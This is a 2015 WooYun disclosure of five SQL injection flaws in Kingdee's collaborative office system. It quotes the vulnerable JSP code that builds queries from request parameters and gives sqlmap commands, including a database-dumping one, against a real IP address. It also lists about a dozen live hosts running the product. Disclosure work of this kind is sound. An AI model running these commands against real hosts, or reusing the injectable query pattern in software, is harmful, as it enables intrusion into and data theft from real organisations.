当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133721

漏洞标题:金蝶协作办公系统存在五个高危SQL注射

相关厂商:金蝶

漏洞作者: 路人甲

提交时间:2015-08-13 14:41

修复时间:2015-11-11 14:46

公开时间:2015-11-11 14:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-13: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向第三方安全合作伙伴开放
2015-10-07: 细节向核心白帽子及相关领域专家公开
2015-10-17: 细节向普通白帽子公开
2015-10-27: 细节向实习白帽子公开
2015-11-11: 细节向公众公开

简要描述:

金蝶协作办公系统存在五个高危SQL注射

详细说明:

存在漏洞的文件为

/kingdee/login/comm_user.jsp?sel_type=1 sel_type存在漏洞
/kingdee/flow_performance/flow_performance_view_case_modify.jsp?id=1 id存在漏洞
/kingdee/flow_performance/get_one_view_case.jsp?id=1 id存在漏洞
/kingdee/login/addmsg.jsp?user_id=1&receiveid=all user_id存在漏洞
/kingdee/login/InstantMessage.jsp?receiveid=1  receiveid存在漏洞


这5个注入均可以用sqlmap跑出数据:
0x1 /kingdee/flow_performance/flow_performance_view_case_modify.jsp 部分漏洞代码为

<%
String id = PubFunc.toString(request.getParameter("id"));
TableCtrl db = new TableCtrl();
String sql  = "select name,";
//...
sql += "a.use_part_id ";
sql += "from x_flow_performance_view_case a where id="+id;
Vector vec = db.open(sql);
//...
}


sqlmap.py -u "http://221.226.149.17:8080/kingdee/flow_performance/flow_performance_view_case_modify.jsp?id=1"


1.png


0x2 /kingdee/flow_performance/get_one_view_case.jsp部分漏洞代码为

String id = PubFunc.toString(request.getParameter("id"));
TableCtrl db = new TableCtrl();
String sql  = "select id,name,";
sql += "a.search_case,";
sql += "a.type,";
sql += "a.analyse_value,";
sql += "a.data_value,";
sql += "a.memo,";
sql += "a.isdefault ";
sql += "from x_flow_performance_view_case a where id="+id;
Vector vec = db.open(sql);
if(vec.size() == 0){
	out.println("ERR");
	return;
}


sqlmap.py -u "http://221.226.149.17:8080/kingdee/flow_performance/get_one_view_case.jsp?id=1"


2.png


0x3 /kingdee/login/addmsg.jsp部分漏洞代码为

if(null==updatemsg||updatemsg.equals("")){
	String index_id = (db.maxId("basic_oicq","index_id")+1)+"";
	if(receiveid.equals("all")){
		String temp[]=db.getFieldArr("select user_id from basic_user where user_id>0 and user_id<>"+user_id+" and del_mark=0 and status=0 order by sort");
		ServiceRoot.getInstance().newService("30","0","创建",user_id,"",temp,true,null);
		ServiceRoot.getInstance().newLogs(user_id,ServiceRoot.getInstance().getPersonnel().getUserValue(user_id,"user_name")+"发送了一条即时消息给所有人");
		String user_ids="";
		for(int i=0;i<temp.length;i++){
			if(i==0){
				user_ids+=temp[i];
			}else{
				user_ids+=","+temp[i];
			}
		}


sqlmap.py -u "http://221.226.149.17:8080/kingdee/login/addmsg.jsp?user_id=1&receiveid=all"


3.png


0x4 /kingdee/login/comm_user.jsp部分漏洞代码为

String sql = "select a.user_name,b.department_name,a.user_title,a.title_type,a.telephone,a.address,a.login_name,a.user_id,a.hand_telephone,a.isSendMes,a.sort,(select status from basic_user_status where user_id=a.user_id) as 'status' from basic_user a,basic_org b where ('0' in (select department_id from prms_bbsdept where user_id="+user_id+") or B.department_id in (select department_id from prms_bbsdept where user_id="+user_id+")) and a.del_mark=0 and a.status=0 and a.department_id=b.department_id and a.user_id>0";
sql+=Mail.sql_or_array(sel_name," a.user_name like '%#%'","and","");
sql+=Mail.sql_or_array(sel_dept," b.department_name like '%#%'","and","");


sqlmap.py -u "http://221.226.149.17:8080/kingdee/login/comm_user.jsp?sel_type=1"


4.png


0x5 /kingdee/login/InstantMessage.jsp部分漏洞代码为

<%
String receiveid=request.getParameter("receiveid");
 if(receiveid==null ||receiveid.equals(""))
 	out.println("") ;
TableCtrl db = new TableCtrl();
Vector vec;
String str="";
if(receiveid.equals("all"))
 	vec= db.open("select B.user_name ,A.sedtime,A.msg,A.sendid from basic_oicq A,basic_user B  where B.user_id=A.sendid and sendid<>"+session.getAttribute("user_id")+" and receiveid='all' and is_all=2 and ','"+PubFunc.getDSChar()+"A.isread"+PubFunc.getDSChar()+"',' not like '%,"+session.getAttribute("user_id")+",%' order by sedtime ");
else
 	vec= db.open("select B.user_name ,A.sedtime,A.msg,A.sendid from basic_oicq A,basic_user B  where B.user_id=A.sendid and  A.isread='0' and A.receiveid="+session.getAttribute("user_id")+" and A.sendid='"+receiveid+"' and is_all=2 order by sedtime ");
for(int i=0;i<vec.size();i++){
	String temp[]=(String[])vec.elementAt(0);
	str=("<font style=\"font-size: 14px;color: #1B25EF;\">"+temp[0]+"("+temp[1]+")</font><br><font style=\"font-size: 14px\">"+temp[2]+"</font><br>");
}
out.println(str) ;
 %>


sqlmap.py -u "http://221.226.149.17:8080/kingdee/login/InstantMessage.jsp?receiveid=1"


5.png


互联网上案例很多,给出几个:

http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://122.139.60.103:800/kingdee/login/loginpage.jsp
http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp
http://222.179.238.182:8082/kingdee/login/loginpage2.jsp
http://222.134.77.23:8080/kingdee/login/loginpage.jsp
http://221.4.245.218:8080/kingdee/login/loginpage.jsp
http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://220.189.244.202:8080/kingdee/login/loginpage.jsp
http://222.133.44.10:8080/kingdee/login/loginpage.jsp
http://223.95.183.6:8080/kingdee/login/loginpage.jsp
http://61.190.20.51/kingdee/login/loginpage.jsp
http://60.194.110.187/kingdee/login/loginpage.jsp
http://oa.roen.cn/kingdee/login/loginpage.jsp

漏洞证明:

用SQLMAP跑出的数据:

sqlmap.py -u "http://221.226.149.17:8080/kingdee/login/InstantMessage.jsp?receiveid=1" --dbs


data.png

修复方案:

过滤吧

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-13 14:45

厂商回复:

谢谢对金蝶的关注,此产品为合作伙伴产品,我们已通知相关部门为客户修复。

最新状态:

暂无